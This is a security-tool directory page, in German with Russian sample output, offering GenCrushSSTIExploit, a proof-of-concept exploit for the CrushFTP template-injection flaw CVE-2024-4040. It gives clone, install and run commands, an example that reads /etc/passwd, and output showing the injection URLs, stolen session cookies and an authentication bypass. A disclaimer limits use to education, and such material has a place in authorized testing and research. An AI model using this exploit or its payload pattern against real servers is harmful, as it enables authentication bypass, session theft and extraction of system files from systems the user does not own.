Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
GenCrushSSTIExploit — ist ein PoC für CVE-2024-4040 Tool zum Ausnutzen der SSTI-Schwachstelle in CrushFTP | Kitploit
Tools/GitHubGitHub/geniuszly/gencrushsstiexploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

ist ein PoC für CVE-2024-4040 Tool zum Ausnutzen der SSTI-Schwachstelle in CrushFTP

Repository anzeigen
81vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DE

GenCrushSSTIExploit ist ein PoC-Exploit-Tool, das auf die SSTI-Schwachstelle (Server-Side Template Injection) in CrushFTP CVE-2024-4040 abzielt. Dieses Tool demonstriert, wie diese Schwachstelle nur zu Bildungs- und ethischen Hacking-Zwecken ausgenutzt werden kann.

Funktionen

  • Stellt eine Sitzung mit dem CrushFTP-Server her, um Authentifizierungs-Cookies zu extrahieren.
  • Nutzt die SSTI-Schwachstelle aus, um Payloads einzuschleusen.
  • Versucht, die Authentifizierung zu umgehen und sensible Dateien vom Server zu extrahieren.
  • Verwendet rich für eine schöne und gestaltete Konsolenausgabe.

Haftungsausschluss

⚠️ Verwenden Sie dieses Tool verantwortungsbewusst! Es ist nur für Forschungs- und Bildungszwecke bestimmt. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Installation

Voraussetzungen

  • Python 3.7+
  • pip (Python-Paketinstallationsprogramm)

Repository klonen

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

Erforderliche Pakete installieren

root@kitploit:~
pip install -r requirements.txt

Verwendung

Grundlegender Befehl

root@kitploit:~
python GenCrushSSTIExploit.py -t <ZIEL_URL>
  • -t / --target: Gibt die Ziel-URL des anfälligen CrushFTP-Servers an.

Optionale Parameter

  • -l / --lfi: Lokales Datei-Einschließen. Gibt die Datei an, die extrahiert werden soll.
  • -w / --wordlist: Gibt eine Wortliste zum Brute-Forcen von Dateipfaden an.

Beispiel

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

Beispielausgabe

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
Tool herunterladen